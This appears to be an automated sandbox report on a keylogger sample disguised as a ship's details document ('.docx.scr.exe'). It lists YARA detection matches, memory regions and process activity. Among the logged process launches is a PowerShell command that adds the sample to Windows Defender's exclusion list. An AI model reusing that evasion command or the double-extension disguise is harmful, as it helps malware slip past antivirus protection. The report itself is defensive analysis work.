Source: 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 1376, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 6644, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_027F3E28	0_2_027F3E28
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_027FE104	0_2_027FE104
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_027F6F90	0_2_027F6F90
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_05C37448	0_2_05C37448
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_05C37458	0_2_05C37458
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_05C37A08	0_2_05C37A08
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_0774DDF0	0_2_0774DDF0
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_077465C0	0_2_077465C0
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_0774F418	0_2_0774F418
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_07747CAA	0_2_07747CAA
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_07748B28	0_2_07748B28
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_0774E3E8	0_2_0774E3E8
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_07747708	0_2_07747708
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_0774E7E0	0_2_0774E7E0
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_0774E7D0	0_2_0774E7D0
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_0774AE18	0_2_0774AE18
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_0774AE08	0_2_0774AE08
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_0774654D	0_2_0774654D
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_07746521	0_2_07746521
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_0774DDE2	0_2_0774DDE2
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_0774AC10	0_2_0774AC10
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_0774AC01	0_2_0774AC01
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_0774F408	0_2_0774F408
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_0774E3D8	0_2_0774E3D8
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_0774EB90	0_2_0774EB90
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_07747271	0_2_07747271
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_07745A60	0_2_07745A60
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_07748A10	0_2_07748A10
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_07749A08	0_2_07749A08
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_0774B287	0_2_0774B287
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_077499F9	0_2_077499F9
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_0774B0A8	0_2_0774B0A8
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_0774E0A8	0_2_0774E0A8
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_0774E098	0_2_0774E098
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_0774B099	0_2_0774B099
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_079A05F0	0_2_079A05F0
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_079A0040	0_2_079A0040
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_079A9650	0_2_079A9650
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_079A9660	0_2_079A9660
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_079A75B0	0_2_079A75B0
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_079A05E0	0_2_079A05E0
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_079A9219	0_2_079A9219
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_079A9228	0_2_079A9228
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_079A0006	0_2_079A0006
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_079A8DF0	0_2_079A8DF0
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_079A2C57	0_2_079A2C57
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_079A8B80	0_2_079A8B80
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_079A79E8	0_2_079A79E8
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_02FED278	3_2_02FED278
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_02FE5362	3_2_02FE5362
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_02FEA088	3_2_02FEA088
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_02FEC19F	3_2_02FEC19F
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_02FE7118	3_2_02FE7118
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_02FEC738	3_2_02FEC738
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_02FEC468	3_2_02FEC468
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_02FECA08	3_2_02FECA08
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_02FE69B0	3_2_02FE69B0
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_02FEE988	3_2_02FEE988
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_02FE3E09	3_2_02FE3E09
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_02FECFAB	3_2_02FECFAB
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_02FECCD8	3_2_02FECCD8
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_02FE3AA1	3_2_02FE3AA1
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_02FE29EC	3_2_02FE29EC
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_02FE39ED	3_2_02FE39ED
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_02FEE97B	3_2_02FEE97B
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_06F874B0	3_2_06F874B0
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_06F84318	3_2_06F84318
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_06F8C0A0	3_2_06F8C0A0
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_06F84E00	3_2_06F84E00
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_06F82FC8	3_2_06F82FC8
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_06F83C38	3_2_06F83C38
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_06F8B9D0	3_2_06F8B9D0
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_06F8B7B0	3_2_06F8B7B0
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_06F824C8	3_2_06F824C8
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_06F874A0	3_2_06F874A0
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_06F8F580	3_2_06F8F580
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_06F84308	3_2_06F84308
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_06F8B028	3_2_06F8B028
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_06F8B019	3_2_06F8B019
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_06F8F128	3_2_06F8F128
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_06F82FB8	3_2_06F82FB8
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_06F83C27	3_2_06F83C27
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_06F8F9D8	3_2_06F8F9D8
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_06F8F9C8	3_2_06F8F9C8

Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1727712937.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735033280.0000000006F90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000000.1699675775.00000000005C0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameIecr.exe: vs HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1736037299.0000000007522000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1736037299.0000000007522000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1729417735.0000000002BE7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1739515757.000000000B580000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1730714244.0000000003971000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4162422602.0000000001377000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Binary or memory string: OriginalFilenameIecr.exe: vs HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.449e798.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4417178.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.449e798.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4417178.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 1376, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 6644, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/3@3/3

Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o1xyklf3.dpw.ps1

Jump to behavior

Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Virustotal: Detection: 30%
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	ReversingLabs: Detection: 28%

Source: unknown	Process created: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe"
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe"
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process created: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process created: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe"	Jump to behavior

Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: windowscodecs.dll	Jump to behavior
